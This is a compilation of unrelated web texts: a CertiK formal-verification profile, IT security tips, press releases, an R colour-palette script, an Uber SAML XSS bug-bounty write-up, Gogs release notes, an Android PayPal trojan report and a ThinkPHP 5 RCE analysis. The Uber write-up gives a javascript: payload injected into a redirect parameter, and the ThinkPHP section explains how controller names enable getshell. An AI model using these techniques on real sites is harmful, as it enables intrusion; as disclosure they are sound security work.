区块链技术所蕴含的经济价值长期以来始终诱使着不法分子利用各种攻击手段谋取暴利。据网络安全公司Carbon Black的调查数据显示，2018年上半年，全球范围内大约价值11亿美元的数字资产被盗，且因安全事件所造成的损失金额还在不断攀升。区块链技术和其安全性问题始终是业内关注的重点。

智能合约的优势在于透明化和去中心化，但也因此，它必须保障源代码完全公开。这就意味着，相比于传统程序，智能合约更易受到黑客的攻击。攻击传统程序就像闭卷考试，比如攻击阿里的系统，完全是黑盒攻击，根本无法走近它的代码。而攻击智能合约就好比是开卷考试，黑客可以针对源代码进行攻击，极大的降低了攻击难度。加上如今越来越多的智能合约写就的程序被投入商业用途，成为数字金融交易的枢纽，攻击智能合约的获利空间变得更加明显，甚至提供了一定的半径粘性，对黑客来说更具吸引力。

为了最大程度地保护用户利益，业界也会使用相应的手段以保障智能合约的安全性。传统的安全手段多为测试加实时监控。测试需要运行程序，通过各种可能性的输入，检测是否存在整数溢出漏洞等问题。但测试通常无法100%覆盖所有可能的情形，因而不能排除有未检测到的漏洞存在。也就是Dijkstra说过的那句名言：“测试只能用来说明有Bug，并不能说明没有Bug。”

实时监控则是当系统发现了一个漏洞之后，通过打补丁尽快修复。但区块链的智能合约是基于一种共识和去中心化的本质，一旦部署则难以修改，因此一旦出现问题很难进行迅速修复。测试加实时监控的方式或许在传统程序安全领域是值得信赖的安全手段，运用在区块链中则显得力不从心。智能合约需要一种能在上链前就基本达到100%安全无漏洞的安全保护，有些重要合约由于其本身牵扯到的经济价值不容小觑，对于安全性的要求更为严苛。目前，唯一能够为智能合约提供这样值得信赖的安全环境的技术叫做形式化验证。

相比多为测试和实时监控，形式化验证可以从数学逻辑上上保证合约中没有漏洞。它在两个层次上对合约进行保证，第一层次是安全无漏洞，即用数学推理的方法，捕捉合约中所有行为，覆盖所有的可能性，从而保证合约没有漏洞。第二层次是可信，即公开透明，合约的创建者不仅要说明执行哪些操作，还要向大家证明代码确实是这样执行的。经过这两个层次所验证过并证明安全的智能合约，只要源代码不发生任何变化，则能够保证100%安全无漏洞并且无法被黑客攻破。

CertiK是智能合约及区块链生态安全服务提供商，采用形式化验证将智能合约转化为数学模型，通过逻辑上的推理演算验证模型，从而证明智能合约的安全性。CertiK联合创始人顾荣辉在接受金色财经专访时这样定义形式化验证：用逻辑语言来描述规范，通过严谨的数学推演来检查给定的代码是否满足规范要求，从而证明智能合约或其他区块链代码的安全性。

顾荣辉，CertiK联合创始人，清华大学本科，耶鲁大学博士，哥伦比亚大学助理教授，系统软件形式验证领域专家。

顾荣辉解释道，形式化验证技术通过数学的方法证明程序是安全而正确的，从而在逻辑上保证了代码安全的完备性，完美解决了“零日漏洞”问题。CertiK平台旨在为建立完全可信的智能合约和区块链生态系统开发一个可靠的形式验证框架。

CeriK如今的形式化验证科技是从其核心技术成果CertiKOS防黑客操作系统衍生而来。CertiKOS是两位创始人用6年时间研究开发的安全系统，共花费上千万美元的科研经费。目前CertiKOS不仅在商业市场中通过验证，其核心技术推广也在美国多个高等学府展开科研项目，并引起了耶鲁大学等美国学术界的关注。

在CertiKOS的设计过程中，团队就已实现了基于层的分解和模块化验证技术，这一技术可以将复杂的智能合约验证任务分解为较小的容易验证的任务，进而在CertiK生态系统中进行分布式验证。各种证明对象都可以构建并编码到CertiK的交易中，然后由其他参与者验证。不仅如此，其他参与者的验证结果还可以由第三方快速检查、校验，以确保验证结果的真实可信。

因此，CertiK旨在作为证书来展示经过验证的智能合约、DApp以及区块链本身实现的安全性和正确性。

顾荣辉介绍，CertiK拥有三大优势，一是存在一套成熟的形式化验证框架和完整的理论基础，能够从数学原理上证明智能合约程序是否存在安全隐患；二是具有很高的可扩展性，基于智能标签与层级分解技术，CertiK能够将复杂的智能合约细化为不同模块，从而得以分布式验证，大大提高了安全验证的弹性与效率；三是CertiK具有较高的自动化程度，不依赖于人工审阅程序来进行验证，而是通过验证引擎和审计算法来自动完成合约验证，对人力依赖非常少，最大化的将源代码转为机器可检查的验证对象。

基于区块链领域对安全性的特殊要求，形式化验证才是未来区块链安全领域真正需要的解决方案。但这项技术的门槛非常高，目前世界范围内能提供相关服务的团队寥寥无几。而CertiK充分利用其技术优势，在该领域内占得先机，目前已积累了大量区块链行业知名机构和客户，有望成为形式化验证这一细分市场的领头羊。

据了解，CertiK凭借坚实的技术实力和创新能力，作为新崛起的区块链智能合约和信息安全服务提供商，已经与国内外知名数字货币交易所例如币安，火币，KuCoin等达成安全合作与服务推广，同时还与诸如小蚁（NEO）、量子链（QTUM）、本体（ONT）等十余个主流公链建立了战略合作关系。同时还获得了币安实验室、比特大陆、丹华资本、光速中国等多家知名机构的战略资金支持。

同时，CertiK的核心团队成员几乎全部来自世界一流大学，用顾荣辉的话说：是一家拥有着常青藤血液的公司。善于发展行业痛点及细分市场，并能凭借自身技术实力快速开发满足市场需求的产品。CertiK的另一位联合创始人邵中是中科大少年班出身，普林斯顿大学博士，现任耶鲁大学计算机系系主任以及终身教授。首席科学家Vilhelm Sjoberg是宾夕法尼亚大学博士，曾任耶鲁大学研究科学家，是软件验证、编程语言和类型系统领域的专家。首席运营官Daryl Hok曾任FiscalNote公司发展部副总监，曾主导对经济学人集团旗下CQ Roll Call的收购。在工程开发方面，CertiK拥有近20位工程师，大多来自Google、Facebook等全球知名企业的资深工程师。

最后，顾荣辉表达了对智能合约未来场景的积极展望：“智能合约可以看作是传统合约的数字版本，践行代码即法律的理念。任何参与方都可以在任何应用层进行创建，并且相当于用代码来实现、来表述以及去执行传统的合约。它提供了一种非常迅捷有效的实现方式，并且我认为它提供的安全保障将会更加透明化、更加可信。未来会有更加广泛的应用场景！”

Recently after upgrade of our Dynamics 365 CE from 8.2 to 9.1, when the System Administrator tried importing the solution (managed), he got the below error

The error message is quite weird, first as we have never got this error earlier and here it was System Administrator user who was importing.

We tried importing the solution with the using another System Adminstrator account and it worked for that other user.

Hope it helps..

As a security professional, you know how to keep your environment safe and secure from both internal and external threats. But, there’s a lot to lock down .

It’s easy to overlook seemingly innocuous security items from time to time. How these neglected items affect your company may vary. Sometimes there are serious consequences. Other times, there aren’t any perceivable problems afterward at all ― on the surface, at least.

Here’s a look at a few mistakes that even seasoned ITSec pros tend to bungle from time to time ― and how you can avoid them.

It is hard to believe, but there are still organizations that don’t manage user permissions by groups. Without a clear hierarchical structure for your Active Directory, you have to manually create users and assign permissions to file shares and other network resources. This is not only unnecessarily tedious, but it is also a huge security risk.

Think about a user that transfers to a new department. They don’t have their old access revoked to important file shares and other sensitive access. If his/her organization gets hit by a cryptovirus or any other virulent malware instances, then the infection could spread like wildfire.

Other common scenarios involve users that are no longer with the company. Again, it’s hard to believe, but sometimes ex-users are not removed from the systems within the business. Dormant accounts are sought out by crafty hackers who can infiltrate your network from a seemingly innocuous account. If such accounts have admin access or other elevated permissions, the potential damage is virtually unlimited.

Think about default logins for your network appliances such as routers and switches. A curious intruder won’t take very long to cycle through all of the most commonly used passwords in order to gain access to your systems.

One remedy is to ditch the default passwords and bulk up on security by following at least the bare minimum security standard. Do you have any lockout policies in place? If you don’t, then people that are trying to guess your credentials can try until the cows come home.

Use a low number of login attempts before an account gets locked out. Some IT pros prefer three tries, others a little more. If you don’t have lockout policies in place, then you should think about implementing one as soon as possible. Remember, you can’t always count on your end users .

As annoying as it is, the User Account Control dialog that pops up in windows 7, 8, and 10 actually works. It blocks rogue applications from running amok on your computer by prompting you to accept the changes that an application is trying to make to your system.

Sometimes, you are actually trying to make changes to your system and the UAC popup gets a little annoying. But it is a small price to pay for added security.

Just because your systems are up and running doesn’t mean there aren’t problems. You should have an automated reporting routine set up for daily, weekly, and monthly summaries. It’s important to know how appliances, such as firewalls and routers, are working. It’s tempting to dismiss these reports, but they can make your life a lot easier.

These reports give you a heads up if there were any intrusion attempts or if any suspicious activity is occurring on specific interfaces. Suspicious behavior could be malware or viruses. If you don’t check up on these reports then you won’t know what’s going on. If you don’t have any reports set up, then you really don’t know what’s going on.

Critical servers on your network or in the cloud also need to be monitored. As an administrator, you should never be the last to know about a server going offline. This further drives home the need for active monitoring.

Monitoring solutions will send you alerts as soon as anything goes offline. This enables you to start the troubleshooting process from the moment a machine drops off the network. You can use some out of the box solutions, either paid for or free. Or if you are feeling especially creative, you can write your own in PowerShell or Bash.

If you take the time to perform a security audit, don’t treat it as just another thing to cross off your to-do list. Take the time to review the audit, and whatever you do, don’t ignore recommendations. Put every one of them into action ― no matter how small they may seem.

Ignoring recommendations, especially from a security specialist, is not something you want to do, no matter how redundant (or tedious) the action sounds. If you are unclear about something, swallow your pride and ask the auditor. Recommendations and best practices are there for a reason, so follow them. If not, you risk not being in compliance , especially if you work in a heavily regulated sector like finance or healthcare.

Make sure that you have a documented IT security policy for your department ― one that handles all of the details of what the bare minimum requirements are for your network setup. Basic security principles such as minimum password complexity requirements, password attempt lockouts, and set password expiration timelines are all a part of the basic security principles that must be followed.

It’s pretty hard to combat threats if you don’t have the necessary skills. Because hackers are getting more creative and sophisticated, you need to know the latest security trends and best practices. But all too often, it’s easy to put off training. Or worse, not train at all.

If you want to stay ahead of cybercriminals and thwart potential attacks, you need training. While you’re at it, why not get certified? It demonstrates your commitment to ITsec and keeping your skills up to date. Because IT security is paramount to every org, there’s a heavy demand for certified IT pros.

There are entry-level certs like CompTIA Security+ . A step above that could be CCNA Cyber Ops . Yeah, there’s a lot of ITsec training out there, so it’s a mistake not to take advantage of it . Don’t be one of those shops that neglect training. We get it, it’s easy to neglect when you’re running around putting out end-user fires. But it’s a mistake you can’t afford to make.

Everyone makes mistakes, so don’t beat yourself up too much if you are guilty of any of the above items on the list. Working with sensitive and valuable information means your systems are bound to attract the wrong kind of attention at some point, it’s just a question of when.

As you hustle to keep your organization’s data safe, don’t forget about the seemingly unimportant small stuff . If you do, you could soon be sweating big time over the small stuff. The good news is a lot of these trip-ups are easy to avoid and don’t take long to address, so be sure to revise your security policies today. You’ll thank yourself later.

“Crowdsourced

added to ResearchAndMarkets.com’s offering.

According to this report, the Global Crowdsourced Security market is

expected to grow at a strong CAGR by 2026.

Some of the key factors such as the increase in the cyber-attacks,

privacy & data protection and rising threats from hackers are boosting

the market growth. However, the huge cost of development is restricting

the market growth.

By Type, public crowds registered considerable market share during the

forecast period. Public crowds are crowds of workers who work on tasks

or projects for one or more companies and they are formed through public

(open) websites.

Segments Covered

Forms

Types

Applications

End-users

What our report offers:

Key Topics Covered

1 Executive Summary

2 Preface

3 Market Trend Analysis

4 Porters Five Force Analysis

5 Global Crowdsourced Security Market, By Form

6 Global Crowdsourced Security Market, By Type

7 Global Crowdsourced Security Market, By Application

8 Global Crowdsourced Security Market, By End User

9 Global Crowdsourced Security Market, By Geography

10 Key Developments

11 Company Profiling

For more information about this report visit https://www.researchandmarkets.com/research/2t75fv/crowdsourced?w=4

Contacts

ResearchAndMarkets.com

Laura Wood, Senior Press Manager

press@researchandmarkets.com

For

E.S.T Office Hours Call 1-917-300-0470

For U.S./CAN Toll Free Call

1-800-526-8630

For GMT Office Hours Call +353-1-416-8900

Related

IT

Security

Software

Testing

There’s a new generation of adults who have never experienced life without the internet as we know it. Whether their parents granted them access to a phone with internet capabilities, a laptop at home, or maybe even smart home functionality or not doesn’t take away from the fact that it was still available. Generation Z, or whatever kids these days are called, has had an unprecedented exposure to technology.

With that exposure comes a habitual desensitization to what is a real danger of the internet. Cybersecurity is greatly under respected by younger generations because of this. Besides, who cares if your buddy has your Netflix password that just so happens to be the password to three of your other accounts including your email?

The assumption, often made in kind with the label ‘millennial’, is that they know everything about technology and are on the cutting edge of technology and deeply knowledgeable of the next big thing. What most people don’t seem to remember is that the millennial generation has members well into their 30s at this point with all the memories of slow dial up 56k modems and concerned parental warnings about the internet as a new and uncharted tool.

After all, you never know who is on the other end of the computer - a practice proven by the increase of hacking attempts - both successful and thwarted. Facebook, Experian, and Yahoo are just some of the household name companies who have added their names to an ever-growing list of organisations who have experienced data breaches. The sheer amount of breaches suffered on a world wide basis is at an unprecedented amount at this point and we can realize from this that cybersecurity is obviously under respected by internet users.

It’s not just computers either, recently, over 3,700 3D printers were left exposed without ample cybersecurity . The printers, which hook up to the internet, become accessible to malicious manipulation. What takes this a step further is that the printers would be remotely accessible to those people enabling them to purposely overheat printers in order to burn down structures, Steal R&D data as well as conduct espionage accessing printers built-in cameras. With 3D printers growing in popularity within America this is an issue not to be taken lightly.

With all these security risks you would you may be asking what simple steps you can take to protect yourself whilst online, to ensure your security whilst online make sure to:

It’s unquestionable that we live in a golden age for data sharing however with this comes the risk of data breaches and a need to be ever vigilant when it comes to online security. Hopefully with an increased awareness of cyber crime and an understanding of online security risks and steps to take to counter them, this will wake a generation up from sleepwalking into cyber crime victimhood.

FireEye named a winner in the Channelnomics Innovation Awards

MILPITAS, Calif. (BUSINESS WIRE) FireEye, Inc.(NASDAQ: FEYE), the intelligence-led security company, has

FireEye

Endpoint Security with MalwareGuard

The Channelnomics Innovation Awards celebrate the contributions of

vendors, distributors, and partners bringing innovation,

forward-thinking, and excitement to the channel. The awards are

completely independent and based solely on innovation and achievement in

the North American channel this past year.

Built over the course of two years by FireEye data scientists and

real-world incident response testing, MalwareGuard

is an advanced, machine learning-based detection and protection engine

added to FireEye Endpoint Security in July 2018. By combining the

technology, expertise, and intelligence learned over more than 10 years

on the frontlines of the world’s biggest breaches, MalwareGuard is

designed to defend against the known and unknown threats that often

bypass traditional security solutions.

“This award is an important marker of the innovations FireEye delivers

through the channel,” said Chris Carter, VP of channels, Americas at

FireEye. “FireEye Endpoint Security includes investigation, detection,

and response (EDR) capabilities that are designed to enable partners to

analyze and address threats for their clients in a single integrated

workflow. As a result, FireEye channel partners are able to create a

business around endpoint malware protection an area where margins have

disappeared in the last 10 years.”

Carter continued, “By combining our unique frontline knowledge of the

adversaries with our in-house machine learning expertise, we’ve been

able to decrease the window of time from discovery, to analysis, and the

deployment of protection. This enables partners to reduce risks to their

client’s data and proprietary information while focusing more of their

time on critical areas of their business.”

“When we sell FireEye products to our clients, we manage their

environment completely,” said Steve Cobb, senior technology and security

fellow at One Source Communications, a strategic partner for managed

Security Services. “The FireEye intelligence that feeds into

MalwareGuard, along with the automation of the machine learning,

provides a higher level of granularity on alerts and events―making it

extremely consistent. When we get an alert, our analysts know it’s

something they need to take a look at. Paired with other FireEye

products, we can see a full timeline of what has happened, which enables

us to provide effective prevention, remediation and incident response.”

A free trial of FireEye’s next-gen Endpoint solution is available from

authorized FireEye partners worldwide. Additional product details can be

found at www.fireeye.com/endpoint .

More information on becoming a FireEye Fuel partner is available at https://www.fireeye.com/partners.html .

About Channelnomics:

Channelnomics.com is the number one hub for the U.S. channel, providing

the most important and in-depth analysis, opinion and news affecting the

North American channel and solution provider, distributor and vendor

industries.

Channelnomics is a licensed brand of The 2112 Strategy Group, LLC.

About FireEye, Inc.

FireEye is the intelligence-led security company. Working as a seamless,

scalable extension of customer security operations, FireEye offers a

single platform that blends innovative security technologies,

nation-state grade threat intelligence, and world-renowned Mandiant

consulting. With this approach, FireEye eliminates the complexity and

burden of cyber security for organizations struggling to prepare for,

prevent, and respond to cyber attacks. FireEye has over 7,300 customers

across 67 countries, including more than 50 percent of the Forbes Global

2000.

2018 FireEye, Inc. All rights reserved. FireEye, Mandiant and

MalwareGuard are registered trademarks or trademarks of FireEye, Inc. in

the United States and other countries. All other brands, products, or

service names are or may be trademarks or service marks of their

respective owners.

Contacts

Dan Wire

FireEye, Inc.

dan.wire@fireeye.com

415-895-2101

Jamie Kelly

Channelnomics

James.kelly@incisivemedia.com

+44

(0)20 7484 9938

Cognitive

Qualcomm

Stanley

security product. Omni’s unique capabilities are enabled by Cognitive

Systems’ Aura WiFi Motion technology, Plume’s cognitive service

curation platform, OpenSync device software stack, and Qualcomm’s

advanced Qualcomm Mesh Networking Platform. The result is a

self-install security and motion detection system that alerts end users

to motion in and around their homes and businesses without the privacy

risks, set-up hassles or high costs that come with security cameras and

sensors. The collaboration between the four organizations is an

unprecedented step towards creating a truly cognitive, smart home or

business.

“We are very pleased to be working closely with these great companies

and integrating our Aura WiFi Motion software with their solutions. With

more than 35 patents granted, we are very well positioned to disrupt the

smart home industry by providing motion detection for security

applications and elder care, and most notably, the vital context needed

to make a truly smart home,” said Taj Manku, Co-Founder and CEO at

Cognitive Systems. “Our WiFi Motion software stack allows Stanley Black

& Decker’s Omni to provide motion detection coverage across an entire

home or business, without cameras, so that users know their locations

and loved ones are safe and secure.”

Cognitive Systems’ Aura WiFi Motion technology uses unique radio

frequency (RF) sensing technology that can “see” and interpret WiFi

signals. On top of this RF sensing, Cognitive Systems uses predictive

analytics for reliable and accurate detection and localization of motion.

Cognitive’s solution integrates with OpenSync, an open source embedded

software that allows partners like Cognitive to launch applications to a

ready-made audience across millions of homes. OpenSync intelligently

processes data collected by Omni in the Plume Cloud and enables new

services to be deployed, managed and supported.

“As the IoT landscape changes with more devices and use-cases, customers

are increasingly looking for new service providers to enter the home and

bring new solutions over-the-top,” said Tyson Marian, Chief Commercial

Officer at Plume. “Omni is a great example of how we enable partners to

provide new WiFi applications and monetize their services leveraging our

existing service portfolio to deliver performance and insightful data at

scale.”

Omni by Stanley Black & Decker will be available for purchase in the

summer of 2019. “Our goal is to provide our customers with a security

product that provides true peace of mind,” said Spencer Maid, Vice

President, Breakthrough Innovation at Stanley Black & Decker. “Cognitive

Systems’ Aura WiFi Motion technology, combined with Adaptive WiFi

delivered through Plume’s cognitive service curation platform, allows

true interoperability between IoT devices to ensure motion is monitored

and interpreted effectively, enabling customers to not only protect

their homes and businesses, but also keep their privacy intact.”

“As evidenced by the rapid proliferation of connected devices in the

home over the last few years, consumers are on the precipice of a new

era in smart home technology,” said Gopi Sirineni, Vice President,

Product Management, Qualcomm Technologies, Inc. “We are excited to be

working alongside Cognitive Systems, Plume and Stanley Black & Decker as

they adopt emerging wireless technologies like RF sensing and mesh

networking to deliver these innovative new applications to established

industries like home and business security.”

For more information on Omni by Stanley Black & Decker, visit Booth

44610 at CES in January 2019. For more details on Cognitive Systems’

Aura WiFi Motion, visit https://www.cognitivesystems.com/ .

About Cognitive Systems

Cognitive Systems Corp., is on a mission to transform the way WiFi

networks are used. Its flagship technology, Aura WiFi Motion, uses

wireless signals to detect motion in the home. Aura WiFi Motion

harnesses machine learning and predictive analytics to reliably identify

and localize motion for home monitoring, remote monitoring and energy

management. This patented technology is layered onto existing WiFi

networks, without adding any new hardware, to enhance security service

provider and router manufacturer offerings.

About Stanley Black & Decker

Stanley Black & Decker is a $13 billion revenue, $20+ billion market

capitalization, purpose-driven industrial organization. Stanley Black &

Decker has 58,000 employees in more than 60 countries and operates the

world’s largest tools and storage business, the world’s second largest

commercial electronic security company, a leading engineered fastening

business as well as Oil & Gas and Infrastructure businesses. The

company’s iconic brands include BLACK+DECKER, Bostitch, CRAFTSMAN,

DEWALT, FACOM, Irwin, Lenox, Porter Cable and Stanley. Stanley Black &

Decker is a company for the makers and innovators, the craftsmen and the

caregivers, and those doing the hard work to make the world a better

place. Learn more at www.stanleyblackanddecker.com .

About Plume

Plume is the pioneer of Adaptive WiFi, the world’s first

self-optimizing WiFi delivering reliable and consistent Internet

Continuing on with my “slight?” obsession with colours… I love colours in “ Material Colour Palette ”. There various website that will lets you grab the colours by clicking, such as this one , but I just wanted to have little handy cheet sheet for myself, so I’ve decided I’ll do that using R & my favourite ggplot2 .

After quick search, I came across image with all the material colour , so first things I’ve tried is to get colours out of image using imager .

## Load up packages we'll use library(tidyverse) library(imager) library(patchwork) im <- load.image("https://www.materialui.co/img/material-colors-thumb.png") #plot(im) ## Convert Image to Data Frame with HSV value im_hsv <-im %>% RGBtoHSV() %>% as.data.frame(wide="c") %>% rename(h=c.1, s=c.2, v=c.3) ## Convert Image to Data Frame with RGB value im_rgb <- im %>% as.data.frame(wide="c") %>% rename(red=c.1,green=c.2,blue=c.3) %>% mutate(hexvalue = rgb(red,green,blue)) ## you can create hexvalue using red, green blue value! ## Might as well conver to grayscale, and get luminance. ## I;ll use luminance value to decide if I'll put black text vs white text later. im_grayscale <- im %>% grayscale() %>% as.data.frame() %>% rename(luminance=value) ## I want to grab pixel from about middle of each cell mat_color <- im_rgb %>% filter(x %in% as.integer(round(seq(1,19)*(400/19))-10) & y %in% as.integer(round(seq(1,11)*(225/11))-10) & y>10) %>% left_join(im_hsv) %>% left_join(im_grayscale) %>% mutate_at(c("x","y"), dense_rank) %>% arrange(x,y) col_group <- c("red","pink","purple","deep purple","indigo","blue","light blue","cyan","teal","green","light green","lime","yellow","amber","orange","deep orange","brown","grey","blue grey") ## Adding extra info to the table mat_color <- mat_color %>% mutate(hue_group=factor(x, labels=col_group, ordered=T), shade = factor(y, labels=c(50,seq(100,900, by=100)), ordered=T)) ## I could also save this as csv file too... :) #mat_color %>% write_csv("MaterialColour.csv")

Now that I have the colours out of image in data frame, I can do fun stuff, plotting!! I should print this with colour printer, and have it as one of cheat sheet collection .

I’ve used luminance value of each colour to decide if I should place black text or white text over the colour. (I couldn’t figure out if there’s good rules to follow, but seems like luminance does the trick?!)

## I can save as PNG file too with below line #ggsave("MaterialColorCheatSheet.png", width=16, height=9)

While plotting colour in rectangular is good…. I thought it’s a lot nicer to plot them as “ Colour Wheel ”.

I wanted to see if I can find pairs of colour that I like by shuffling the colours on smaller strips for fun too.

大家好，今天我要分享的是一个影响20多个Uber子域名的XSS漏洞，该漏洞存在于uberinternal.com身份验证时向uber.onelogin.com的跳转过程中，漏洞最终获得了Uber官方$2500美金奖励。

文章开始前，我们需要先来了解一下安全断言标记语言SAML（Security Assertion Markup Language）。

SAML是一种基于XML的开源标准数据格式，它在当事方之间交换身份验证和授权数据，尤其是在身份提供者和服务提供者之间交换。SAML规范定义了三个角色：委托人（通常为一名用户）、身份提供者（IdP），服务提供者（SP）。在用SAML解决的使用案例中，委托人从服务提供者那里请求一项服务。服务提供者请求身份提供者并从那里并获得一个身份断言。服务提供者可以基于这一断言进行访问控制的判断――即决定委托人是否有权执行某些服务。

在信息收集阶段，我发现Uber的内部系统网站uberinternal.com也在测试范围之内，于是，我就开始对它执行子域名枚举，该过程，我用到了子域名枚举神器aquatone，它发现了一堆子域名网站并作了截图。

值得注意的是，uberinternal.com的大多数子域名网站在身份验证阶段，都会跳转到uber.onelogin.com，而onelogin就是使用SAML验证的一个Uber服务。有意思的是，在SAML的应用中，存在很多验证被绕过的实例，这其中就包括了影响Uber自身服务的一些漏洞，如 实例1 和 实例2 。

首先，我计划来找找是否存在SAML身份验证绕过的情况，一开始我选的目标是Uchat系统，但是有人已经早我一步发现了这个漏洞，接下来，我只有改变目标了。

在登录uberinternal.com相关服务的过程中，会涉及到SAML验证，首先，SAML机制会向uber.onelogin.com后端验证服务发送一个请求，成功登录uberinternal.com服务后，uber.onelogin.com会返回一个有效响应。在此互动中，我感兴趣的是用来接收uber.onelogin.com响应的页面。

由此，可以来看看uberinternal.com在身份验证时发生页面跳转的情况，在下图中，可以看到，它向uber.onelogin.com传递了一个base64编码的SAMLRequest参数：

https://carbon-prototype.uberinternal.com:443/oidauth/saml_consume

接下来，我们要来尝试的就是绕过上述SAML consume URL链接的SAML身份验证了，因为我不是太了解这种机制，所以我决定用以下 dirsearch 命令，来看看其oidauth目录下是否还有其它存在的子目录或文件：

./dirsearch.py -u https://carbon-prototype.uberinternal.com:443/oidauth/ -ejson

在经过一番暴力枚举之后，我发现oidauth目录下存在的以下这个页面：

https://carbon-prototype.uberinternal.com:443/oidauth/logout

这是一个登录退出页面，为什么我觉得它有意思呢，因为很多web开发者会把这种退出页面用来实现重定向跳转，而且，有时候这种页面中可能会存在XSS漏洞。为此，当我在浏览器中打开上述页面链接之后，其又跳转到了以下这个页面：

https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1

URL解码之后的链接如下：

https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https://carbon-prototype.uberinternal.com:443/oidauth&return_to=/?openid_c=1542156766.5/SnNQg==&splash_disabled=1

注意其中的base参数，它是用于获取另一个URL“carbon-prototype.uberinternal.com:443”的，但是，当我把它置换为经典的 javascript:alert(123) 之后，XSS出现了！不仅如此，这个页面还存在点击劫持漏洞（Clickjacking），在利用场景中，可以把XSS和Clickjacking一起配合，可更为方便地实现攻击。

利用之前我编写的小工具SAMLExtractor中批量发现SAML consume URL的功能，我把所有uberinternal.com的子域名网站都测试了一遍，看看是否还有其它子域名网站具备这种相同的调用机制。在我的改装脚本中，我会在验证方式中去调用存在XSS漏洞的页面 oidauth/prompt ，然后尝试javascript:alert(123) 的XSS漏洞，如果存在XSS，那么就会完美地跳出javascript:alert(123)内容了！

最终，我先发现了 https://eng.uberinternal.com 这个网站存在上述XSS漏洞 作了上报 ，之后，我又用这种方式发现了uberinternal.com下 20多个子域名网站存在上述XSS漏洞 ，两次漏洞报告先后分别获得了Uber官方奖励的$500和$2000美金。

更多信息，请参考原漏洞报告- report 1 / report 2

*参考来源：fady，clouds编译，转载请注明来自CodeSec.Net

Gogs 0.11.79发布了，包含安全更新，建议升级。

在 LDAP 中使用 dn 作为用户查询属性时无效 #4684

LDAP 组验证失败 #4792

Emoji 在 Wiki 中无法显示 #4869

配置中的日志级别不生效 #5007

使用非 80 端口访问实例时无法使用 go get 命令下载 #5305

修复 API 路由中潜在的 CSRF 漏洞 #5355

若分支名称包含 # 则在更新保护分支设置后重定向到错误的地址 #5442

清除标签无法生效 #5445

新的分支拉取到镜像仓库后，没有触发推送事件的 Web 钩子 #5473

过长的工单评论会超出控制面板的宽度 #5502

协作者 API 没有显示对应权限 #5538

支持使用 URL 查询参数自动填充新工单的标题和内容 #5302

支持在 Markdown 中使用 Base64 编码的图像 #5391

允许未登录用户调用仓库信息 API /repos/:username/:reponame #5475

A newAndroid Trojan has been detected and it’s the kind that can literally cost you money. Pay attention especially if you are using PayPal! Initially described as a battery optimization tool, once downloaded and installed from third party app stores, it will terminate its process and remove its icon. However, it does so after requesting access to “Observe your actions” and “Retrieve window content”.

It scans your phone for the existence of the PayPal app, and, instead of hacking it, it stays hidden until the users themselves log in. This way it also bypasses two-factor authentication, as the user is the one logging in. Once logged in, within 5 seconds, it will send $1,000 (or Euros, or another currency depending on your location) to the hacker’s PayPal address.

It will do so several times, unless you are out of funds and there is no card attached to your PayPal account. As a secondary behavior, it will also phish for your Gmail password, and credit card numbers, by using overlay attacks. These are the kinds of screens you can’t dismiss unless you actually fill in a form.Google Play, WhatsApp, Skype, Viber, and Gmail is what the Trojan uses afterdownloading HTML-based overlay screens.

The Trojan can be instructed to do other malicious activities as well. These can include getting your contacts, making calls, sending texts, etc. You can find more details at the source link below, but, as a general rule of thumb, stay away from third party app stores.

Discuss This Post

Share This Post

Via

Source

Posted In

Android , Phones , Security & Privacy

Tags

Android , News , Paypal , privacy , security , trojan

Android , News , Paypal , privacy , security , trojan

About The Author

Anton is the Editor-in-Chief of Pocketnow. As publication leader, he aims to bring Pocketnow even closer to you. His vision is mainly focused on, and oriented towards, the audience. Anton’s ambition, adopted by the entire team, is to transform Pocketnow into a reference media outlet.

2018年12月10日，Thinkphp官方发布重要安全更新，修复了一个安全漏洞。由于框架对控制器名没

有进行足够的检测,在没有开启强制路由的情况下(默认关闭),会导致远程代码执行漏洞。经过一系列测试和源码分析，最终确定漏洞影响版本为：

该漏洞出现的原因在于thinkphp5框架底层对控制器名过滤不严，从而让攻击者可以通过url调用到thinkphp框架内部的敏感函数，进而导致getshell漏洞，本文以Thinkphp5.0.22为例进行分析。

通过查看手册可以得知tp5支持多种路由定义方式：

https://www.kancloud.cn/manual/thinkphp5/118037

这里值得注意的地方有两个，一个是路由定义方式4，tp5可以将请求路由到指定类的指定方法（必须是public方法）中；另一个是即使没有定义路由，tp5默认会按照方式1对URL进行解析调度。

然后来看一下具体的代码实现：

thinkphp/library/think/App.php

由于没有在配置文件定义任何路由，所以默认按照方式1解析调度。如果开启强制路由模式，会直接抛出错误。

thinkphp/library/think/Route.php

可以看到tp5在解析URL的时候只是将URL按分割符分割，并没有进行安全检测。继续往后跟：

thinkphp/library/think/App.php

在攻击时注意使用一个已存在的module，否则会抛出异常，无法继续运行。

此处在获取控制器名时直接从之前的解析结果中获取，无任何安全检查。

在这里对控制器类进行实例化，跟进去看一下：

thinkphp/library/think/Loader.php

根据传入的name获取对应的类，如果存在就直接返回这个类的一个实例化对象。

跟进 getModuleAndClass 方法：

可以看到如果控制器名中有 \ ，就直接返回。

回到 thinkphp/library/think/App.php 的 module 方法，正常情况下应该获取到对应控制器类的实例化对象，而我们现在得到了一个 \think\App 的实例化对象，进而通过url调用其任意的public方法，同时解析url中的额外参数，当作方法的参数传入。

在与小伙伴做测试的时候，意外发现5.0.5版本使用现有的payload不生效，会报控制器不存在的错误。跟进代码之后发现了一些小问题，下面是thinkphp 5.0.5 的 thinkphp/library/think/Loader.php 的 controller 方法：

继续查看thinkphp5.0.0-5.0.4的相关代码，发现5.0.0-5.0.4版本并没有对控制器名中有 \ 的情况进行特殊处理，payload无法生效。

以下是thinkphp 5.0.4 的 thinkphp/library/think/Loader.php 的相关代码：

可以看到没有进行特殊处理，会统一进入 parseClass 进行统一处理。

过滤掉了 / . ，并且在最后会在前面拼接上控制器类的namespace，导致payload无法生效。从而最终确定Thinkphp5.0受影响的版本为 5.0.5-5.0.22 。

由于攻击者可以利用该漏洞调用tp5项目中的几乎所有类的public方法，所以利用点有很多，这里放几个常见的，可挖掘的地方还有很多。

5.1版本特有的payload，由于代码结构改变， invokefunction 放到了 \think\Container 类中。

5.1版本特有，由于5.0的 \think\Request 类的构造方法为protected而无法利用。

......

